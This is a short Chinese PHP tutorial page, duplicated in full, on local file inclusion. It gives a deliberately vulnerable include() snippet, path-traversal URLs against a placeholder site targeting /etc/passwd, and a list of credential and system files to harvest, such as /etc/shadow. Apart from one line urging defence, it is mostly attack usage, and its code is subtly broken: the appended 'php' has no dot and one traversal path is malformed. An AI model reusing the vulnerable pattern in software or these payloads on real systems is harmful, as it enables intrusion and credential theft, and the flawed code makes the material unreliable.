php 偽造本地文件包含漏洞的代碼
更新時間:2011年11月03日 23:33:36 作者:
php 偽造本地文件包含漏洞的代碼,大家一定要注意防范。
代碼:
<?php
$page=$_GET['page'];
include($page.'php');
?>
你可以這樣使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd
獲取更多數(shù)據(jù):
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
來自hackteach
復制代碼 代碼如下:
<?php
$page=$_GET['page'];
include($page.'php');
?>
你可以這樣使用
http://www.xxx.com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www.xxx.com/index.php?page=..../../etc/passwd
獲取更多數(shù)據(jù):
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
來自hackteach
相關文章
淺談PHP的exec()函數(shù)無返回值排查方法(必看)
下面小編就為大家?guī)硪黄獪\談PHP的exec()函數(shù)無返回值排查方法(必看)。小編覺得挺不錯的,現(xiàn)在就分享給大家,也給大家做個參考。一起跟隨小編過來看看吧2017-03-03PHP將整數(shù)數(shù)字轉換為羅馬數(shù)字實例分享
本篇文章中小編給大家分享了一篇關于PHP將整數(shù)數(shù)字轉換為羅馬數(shù)字的知識點以及實例內容,需要的朋友們學習下。2019-03-03